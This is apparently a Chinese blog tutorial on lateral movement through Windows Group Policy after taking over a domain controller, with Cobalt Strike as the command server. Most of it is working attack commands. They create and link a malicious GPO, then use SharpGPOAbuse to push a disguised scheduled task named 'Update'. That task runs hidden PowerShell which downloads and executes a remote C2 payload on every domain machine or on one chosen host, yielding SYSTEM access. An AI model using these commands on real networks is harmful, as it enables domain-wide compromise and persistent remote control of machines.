组策略(GPO)横向移动

文章目录

        • 组策略横向移动简述
        • 利用组策略上线域内机器
        • 总结

组策略横向移动简述

在拿下目标域控之后需要的靶标可能在其他机器上,并且不知道具体信息
可以通过下面GPO组组策略上线到CS翻找相关靶标资料,或者是遇到特殊环
境必须使用组策略才可以进行横向移动,总的来说组策略进行横向移动适合
大量机器上线也可以用于单一机器上线控制下面将结合CS进行利用演示。

利用组策略上线域内机器

利用步骤:
1.拿下域控权限并创建GPO。
2.将GPO链接到域内需要域管权限。
3.使用SharpGPOAbuse.exe工具添加计划任务上线到cs
利用步骤1:
需要管理员权限创建名为hack123的GPO:
shell powershell -c Import-Module GroupPolicy;new-gpo -name hack123

组策略(GPO)横向移动_第1张图片

利用步骤2:
链接hack123 GPO
shell powershell -c Import-Module GroupPolicy;new-gplink -name hack123 -Target 'dc=test,dc=com'

组策略(GPO)横向移动_第2张图片

利用步骤3:
工具下载:
	https://github.com/FSecureLABS/SharpGPOAbuse
利用:

组策略(GPO)横向移动_第3张图片

SharpGPOAbuse.exe 全部机器上线参数如下:		
execute-assembly /home/kali/Desktop/SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author test\administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('替换为CS的Web Powershell地址'))\"" --GPOName hack123
SharpGPOAbuse.exe 指定机器上线参数如下:		
execute-assembly /home/kali/Desktop/SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author test\administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('替换为CS的Web Powershell地址'))\"" --GPOName hack123 --FilterEnabled --TargetDnsName 指定机器目标IP
需要注意如果直接粘贴CS的Powershell需要注意hidden -c 后面的\

在这里插入图片描述

强制更新组策略默认更新是90分钟:
shell gpupdate /force

组策略(GPO)横向移动_第4张图片
上线后是System权限
在这里插入图片描述

总结

本篇讲解了如何使用GPO组策略下发CS控制全域机器以及单个机器的控制上线,
在大型网络中通过GPO上线全部机器的情况是比较少的因为如果机器太多会导致
CS卡顿因此非特殊情况不会上线全部机器,只会上线单个机器。

你可能感兴趣的:(域安全,java,windows,开发语言)